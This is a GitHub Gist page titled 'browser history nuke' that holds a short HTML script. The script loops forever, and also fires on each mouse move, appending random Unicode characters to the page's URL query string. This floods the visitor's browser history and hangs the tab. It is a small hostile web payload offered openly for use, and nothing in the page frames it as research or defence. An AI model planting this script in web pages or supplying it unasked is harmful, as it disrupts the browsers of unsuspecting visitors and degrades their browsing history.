Skip to content

Instantly share code, notes, and snippets.

@Le0X8
Last active February 27, 2025 17:23
Show Gist options
  • Save Le0X8/dbab05ac2553834dd43348a10ea804f2 to your computer and use it in GitHub Desktop.
Save Le0X8/dbab05ac2553834dd43348a10ea804f2 to your computer and use it in GitHub Desktop.
browser history nuke
<script>
function x() {
window.location.search += String.fromCodePoint(Math.floor(Math.random() * 0x20000));
}
document.onmousemove = x;
while (1) {
x();
}
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment